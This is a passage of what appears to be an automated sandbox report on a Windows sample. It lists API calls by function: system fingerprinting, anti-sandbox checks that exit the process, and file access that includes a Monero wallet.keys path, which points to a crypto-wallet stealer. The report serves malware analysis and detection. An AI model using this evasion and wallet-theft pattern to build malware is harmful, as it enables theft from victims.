RegCloseKey.ADVAPI32(00000000), ref: 0035848C
RegCloseKey.ADVAPI32(00000000), ref: 00358499

Part of subcall function 0035A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0035A7E6

RegQueryValueExA.KERNEL32(00000000,0127E1D8,00000000,000F003F,?,00000400), ref: 003584EC
lstrlen.KERNEL32(?), ref: 00358501
RegQueryValueExA.KERNEL32(00000000,0127E1A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00360B34), ref: 00358599
RegCloseKey.KERNEL32(00000000), ref: 00358608
RegCloseKey.ADVAPI32(00000000), ref: 0035861A

Strings

%s\%s, xrefs: 0035844D

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 5dde142ce286f0815b4b5172cc5ed08670a44f0222056832b40ec3c8462ca479
Instruction ID: 26ce0b269e35e1d2f8a6aca70e25c1df1f5741084f08d1fa83ef5b76b057e43a
Opcode Fuzzy Hash: 5dde142ce286f0815b4b5172cc5ed08670a44f0222056832b40ec3c8462ca479
Instruction Fuzzy Hash: 0D211D719002189BEB24DB54DC85FE9B7B8FB48701F00C5D9EA09A6150DF71AA89DFE4

Function 00357690 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 003576A4
RtlAllocateHeap.NTDLL(00000000), ref: 003576AB
RegOpenKeyExA.KERNEL32(80000002,0126C4A0,00000000,00020119,00000000), ref: 003576DD
RegQueryValueExA.KERNEL32(00000000,0127E298,00000000,00000000,?,000000FF), ref: 003576FE
RegCloseKey.ADVAPI32(00000000), ref: 00357708

Strings

Windows 11, xrefs: 003576BD

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 9530759027cd0dab674001099f5b1f53eebca81e0df040991f431cfaf4428381
Instruction ID: 36abd1045e1095e77d9ad8f28a5e2872a09a5cecefd765e79e11495b3271601a
Opcode Fuzzy Hash: 9530759027cd0dab674001099f5b1f53eebca81e0df040991f431cfaf4428381
Instruction Fuzzy Hash: FB014FB5A04204BBFB01DBE4EC49F6AB7BCEB58701F104455FE04E72A1E6749908AF61

Function 00357720 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357734
RtlAllocateHeap.NTDLL(00000000), ref: 0035773B
RegOpenKeyExA.KERNEL32(80000002,0126C4A0,00000000,00020119,003576B9), ref: 0035775B
RegQueryValueExA.KERNEL32(003576B9,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0035777A
RegCloseKey.ADVAPI32(003576B9), ref: 00357784

Strings

CurrentBuildNumber, xrefs: 00357771

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: b41a6062840ef8c461ef20ee3b6ffccc27b4107d788ee349a3904e28392aaf8e
Instruction ID: 646d133466b63d659c529316b03f6276edb238f33e1f64e9b1c784a0c6c1cccc
Opcode Fuzzy Hash: b41a6062840ef8c461ef20ee3b6ffccc27b4107d788ee349a3904e28392aaf8e
Instruction Fuzzy Hash: 6E01FFB5A40308BBFB00DBE4DC4AFAEB7B8EB58701F104559FE05B7291DA745A049F61

Function 003540B0 Relevance: 9.1, APIs: 6, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 003540D5
RegOpenKeyExA.KERNEL32(80000001,0127DB90,00000000,00020119,?), ref: 003540F4
RegQueryValueExA.ADVAPI32(?,0127E568,00000000,00000000,00000000,000000FF), ref: 00354118
RegCloseKey.ADVAPI32(?), ref: 00354122
lstrcat.KERNEL32(?,00000000), ref: 00354147
lstrcat.KERNEL32(?,0127E520), ref: 0035415B

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: 09582a27d03ae7748a39495e5a573df7e44dff7e1c6cae00b2d11cc05a85fbe0
Instruction ID: 660817587544a4cfa4a1c82c69960a6a0fe0a2e9683cdc74fb0cf50b39effc6c
Opcode Fuzzy Hash: 09582a27d03ae7748a39495e5a573df7e44dff7e1c6cae00b2d11cc05a85fbe0
Instruction Fuzzy Hash: 8041CCB6D001086BEB15EBA0DC46FFD737DA798300F004559BF156B191EA755B8C8BD2

Function 003569F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,01272170), ref: 003598A1
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,01272260), ref: 003598BA
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,012722C0), ref: 003598D2
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,01272218), ref: 003598EA
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,012722D8), ref: 00359903
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,01278EA0), ref: 0035991B
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,01265690), ref: 00359933
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,01265990), ref: 0035994C
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,012722F0), ref: 00359964
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,012721A0), ref: 0035997C
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,012723C8), ref: 00359995
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,01272308), ref: 003599AD
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,01265870), ref: 003599C5
Part of subcall function 00359860: GetProcAddress.KERNEL32(74DD0000,012723E0), ref: 003599DE

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 003411D0: ExitProcess.KERNEL32 ref: 00341211

Part of subcall function 00341160: GetSystemInfo.KERNEL32(?), ref: 0034116A
Part of subcall function 00341160: ExitProcess.KERNEL32 ref: 0034117E

Part of subcall function 00341110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0034112B
Part of subcall function 00341110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00341132
Part of subcall function 00341110: ExitProcess.KERNEL32 ref: 00341143

Part of subcall function 00341220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0034123E
Part of subcall function 00341220: __aulldiv.LIBCMT ref: 00341258
Part of subcall function 00341220: __aulldiv.LIBCMT ref: 00341266
Part of subcall function 00341220: ExitProcess.KERNEL32 ref: 00341294

Part of subcall function 00356770: GetUserDefaultLangID.KERNEL32 ref: 00356774

Part of subcall function 00341190: ExitProcess.KERNEL32 ref: 003411C6

Part of subcall function 00357850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003411B7), ref: 00357880
Part of subcall function 00357850: RtlAllocateHeap.NTDLL(00000000), ref: 00357887
Part of subcall function 00357850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0035789F

Part of subcall function 003578E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00357910
Part of subcall function 003578E0: RtlAllocateHeap.NTDLL(00000000), ref: 00357917
Part of subcall function 003578E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0035792F

Part of subcall function 0035A9B0: lstrlen.KERNEL32(?,01279050,?,\Monero\wallet.keys,00360E17), ref: 0035A9C5
Part of subcall function 0035A9B0: lstrcpy.KERNEL32(00000000), ref: 0035AA04
Part of subcall function 0035A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0035AA12

Part of subcall function 0035A8A0: lstrcpy.KERNEL32(?,00360E17), ref: 0035A905

OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,01278E30,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356ACA
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00356AE8
CloseHandle.KERNEL32(00000000), ref: 00356AF9
Sleep.KERNEL32(00001770), ref: 00356B04
CloseHandle.KERNEL32(?,00000000,?,01278E30,?,0036110C,?,00000000,?,00361110,?,00000000,00360AEF), ref: 00356B1A
ExitProcess.KERNEL32 ref: 00356B22

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
String ID:
API String ID: 2525456742-0
Opcode ID: 45ed4b06d99a617b7b83e3421213b0d9395812c9f85d6f73082c9fc652649ca1
Instruction ID: fb08d099a272fc85193b19a40129ac7c8c600d824d8a92146aee17965a2e63c1
Opcode Fuzzy Hash: 45ed4b06d99a617b7b83e3421213b0d9395812c9f85d6f73082c9fc652649ca1
Instruction Fuzzy Hash: 6A313070904608AADB06F7F0DC57FEE7778AF14342F404619F902AA1A1EF70694DE7A2

Function 003499C0 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003499EC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00349A11
LocalAlloc.KERNEL32(00000040,?), ref: 00349A31
ReadFile.KERNEL32(000000FF,?,00000000,0034148F,00000000), ref: 00349A5A
LocalFree.KERNEL32(0034148F), ref: 00349A90
CloseHandle.KERNEL32(000000FF), ref: 00349A9A

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000505000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000050B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000058A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000720000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.00000000007FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000822000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.000000000082B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992701256.0000000000839000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992935085.000000000083A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993049412.00000000009D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1993067307.00000000009D3000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_340000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: 4d11d4d0357823d2ab5efa644493c736a2c2bd30601dcd303e5806e0c1a6e87e
Instruction ID: 3e49d0057a4146cdc5570851fe0a286c16b39f9ba38fce7fba9f1a6df771523a
Opcode Fuzzy Hash: 4d11d4d0357823d2ab5efa644493c736a2c2bd30601dcd303e5806e0c1a6e87e
Instruction Fuzzy Hash: 87314BB4A00209EFDB15CF94C885FAE77F9FF48300F108159E901AB290D778AA45DFA1

Function 00354780 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0127E4F0), ref: 003547DB

Part of subcall function 00358DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00358E0B

lstrcat.KERNEL32(?,00000000), ref: 00354801
lstrcat.KERNEL32(?,?), ref: 00354820
lstrcat.KERNEL32(?,?), ref: 00354834
lstrcat.KERNEL32(?,0126B8F8), ref: 00354847
lstrcat.KERNEL32(?,?), ref: 0035485B
lstrcat.KERNEL32(?,0127DA50), ref: 0035486F

Part of subcall function 0035A740: lstrcpy.KERNEL32(00360E17,00000000), ref: 0035A788

Part of subcall function 00358D90: GetFileAttributesA.KERNEL32(00000000,?,00341B54,?,?,0036564C,?,?,00360E1F), ref: 00358D9F

Part of subcall function 00354570: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00354580
Part of subcall function 00354570: RtlAllocateHeap.NTDLL(00000000), ref: 00354587
Part of subcall function 00354570: wsprintfA.USER32 ref: 003545A6
Part of subcall function 00354570: FindFirstFileA.KERNEL32(?,?), ref: 003545BD

Memory Dump Source

Source File: 00000000.00000002.1992251783.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true

Associated: 00000000.00000002.1992232508.0000000000340000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000039A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003C8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003CF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003D2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003F1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.00000000003FD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1992251783.000000000045B000.00000040.00000001.01000000.00000003.sdmpDownload File
